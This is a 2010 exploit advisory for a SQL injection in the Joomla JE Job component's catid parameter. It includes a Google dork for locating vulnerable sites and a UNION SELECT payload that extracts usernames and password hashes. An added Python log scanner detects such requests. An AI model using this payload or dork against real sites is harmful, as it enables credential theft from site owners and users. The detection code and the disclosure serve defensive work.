
Joomla Component com_jejob 1.0 (catid) SQL Injection Vulnerability

Created Sunday, 30 May 2010 17:38
# Title: Joomla Component com_jejob 1.0 (catid) SQL Injection Vulnerability
# EDB-ID: 12782
# CVE-ID: ()
# OSVDB-ID: ()
# Author: v3n0m
# Published: 2010-05-28
# Verified: yes

)   )            )                     (   (         (   (    (       )     )
( /(( /( (       ( /(  (       (    (     )\ ))\ )      )\ ))\ ) )\ ) ( /(  ( /(
)\())\()))\ )    )\()) )\      )\   )\   (()/(()/(  (  (()/(()/((()/( )\()) )\())
((_)((_)\(()/(   ((_)((((_)(  (((_)(((_)(  /(_))(_)) )\  /(_))(_))/(_))(_)\|((_)\
__ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_))  _((_)_ ((_)
\ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \|   \| __| _ \ |  |_ _|| \| | |/ /
\ V / (_) || (_ |\ V / / _ \  | (__ / _ \ |   /| |) | _||   / |__ | | | .` | ' <
|_| \___/  \___| |_| /_/ \_\  \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\
.WEB.ID
-----------------------------------------------------------------------
Joomla Component com_jejob 1.0 (catid) SQL Injection Vulnerability
-----------------------------------------------------------------------
Author      : v3n0m
Site        : http://yogyacarderlink.web.id/
Date        : May, 29-2010
Location    : Jakarta, Indonesia
Time Zone   : GMT +7:00
----------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : JE Job
Vendor      : http://joomlaextensions.co.in/
License     : GPLv2
Version     : 1.0 (lower versions may also be affected)
Google Dork : inurl:com_jejob
Users can search for jobs by location, job title or experience. Users can also
see the job categories on the front page, where jobs are displayed by category.
----------------------------------------------------------------
Exploitz:
~~~~~~~
-9999+union+all+select+1,group_concat(username,char(58),password)v3n0m,3,4,5+from+jos_users--
SQLi p0c:
~~~~~~~
http://127.0.0.1/[path]/index.php?option=com_jejob&view=item&catid=[SQLi]
----------------------------------------------------------------
Shoutz:
~~~~
- 'malingsial talks too much, you skill off bullshit on '
- LeQhi,lingah,GheMaX,spykit,m4rco,z0mb13,ast_boy,eidelweiss,xx_user,^pKi^,tian,zhie_o,JaLi-
- setanmuda,oche_an3h,onez,Joglo,d4rk_kn19ht,Cakill Schumbag
- kiddies,whitehat,mywisdom,yadoy666,udhit
- c4uR (next time you vent, don't cry again, uR, bruakakaka)
- BLaSTER & TurkGuvenligi & Agd_scorp (Turkey Hackers)
- elicha cristia [ Mizz U so much... ]
- Joss [at] hack0wn.com
- #yogyacarderlink @irc.dal.net
----------------------------------------------------------------
Contact:
~~~~
v3n0m | YOGYACARDERLINK CREW | v3n0m666[at]live[live]com
Homepage: http://yogyacarderlink.web.id/
http://v3n0m.blogdetik.com/
http://elich4.blogspot.com/ << Update it already >_<
---------------------------[EOF]--------------------------------
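
Detection side of the advisory above, as an added example that is not part of the original advisory or of the JE Job component: it scans web access log lines for com_jejob requests whose catid is not a plain integer, which is what a legitimate category id looks like. The log format (common/combined), the function name and the sample lines are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Common/combined log format (assumed): client address, request target, status code.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})')
INT_RE = re.compile(r"[0-9]+")  # a category id should be a plain integer


def suspicious_jejob_requests(lines):
    """Return (client, status, decoded catid) for com_jejob hits with a non-integer catid."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        # parse_qs decodes '+' and %xx, so encoded variants are compared in one form.
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        if "com_jejob" not in params.get("option", []):
            continue
        for catid in params.get("catid", []):
            if not INT_RE.fullmatch(catid):
                hits.append((client, int(status), catid))
    return hits


# Constructed sample lines using documentation address ranges, not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [29/May/2010:10:01:02 +0700] "GET /index.php?option=com_jejob&view=item&catid=3 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [29/May/2010:10:02:10 +0700] "GET /index.php?option=com_jejob&view=item&catid=-9999+union+all+select+1,2,3,4,5-- HTTP/1.1" 200 7340',
    '192.0.2.44 - - [29/May/2010:10:03:55 +0700] "GET /index.php?option=com_jejob&view=item&catid=3%27 HTTP/1.1" 500 812',
    '198.51.100.7 - - [29/May/2010:10:04:31 +0700] "GET /index.php?option=com_content&catid=news HTTP/1.1" 200 4410',
]

if __name__ == "__main__":
    for client, status, catid in suspicious_jejob_requests(SAMPLE_LOG):
        print(f"{client} status={status} catid={catid!r}")
```

The same integer-only rule is the fix on the application side: a catid that is cast to an integer before it reaches the query cannot carry SQL syntax.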
Category: Joomla Vulnerabilities